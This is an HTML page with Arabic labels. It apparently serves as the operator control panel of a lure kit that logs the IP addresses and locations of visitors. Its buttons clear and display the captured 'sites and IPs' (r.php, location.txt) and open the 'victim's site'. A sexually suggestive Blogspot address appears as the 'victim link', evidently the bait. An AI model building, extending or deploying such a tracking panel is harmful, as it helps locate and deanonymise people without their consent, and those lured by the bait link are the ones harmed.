<!DOCTYPE html>
<html>
  <head>
    <title>النتيجه</title>
    <style>
      h1 {
        text-align: left;
        color: yellow;
      }
      h1:hover {
        cursor: pointer;
        text-decoration: underline;
      }
      
      /* Center the buttons */
      button {
        display: block;
        margin: 20px left 0;
        color: #fff;
        border: none;
        border-radius: 5px;
        padding: 10px;
        font-size: 20px;
        width: 200px;
      }
      
      /* Style the first button as red */
      button:first-of-type {
        background-color: #FF0000;
      }
      
      /* Style the second button as orange */
      button:nth-of-type(2) {
        background-color: orange;
      }
      
      /* Style the third button as green */
      button:last-of-type {
        background-color: #008000;
      }
    </style>
  </head>
  <body style="background-color: #000000">
    <h1 style="text-align: left; color: #fff">!أدوات التحكم</h1>
 
    <button onclick="window.location.href='r.php'">مسح المواقع والايبي</button>
    <button onclick="window.location.href='location.txt'">اظهار المواقع والايبي</button>
    
    <button onclick="window.location.href='index.html'">الذهاب لموقع الضحيه</button>
    
    <h1 style="text-align: left; color: Yellow">رابط الضحيه 🤙</h1>
    
    <h1 id="victim">https://sexylady2023.blogspot.com</h1>

    
    
    
  </body>
</html>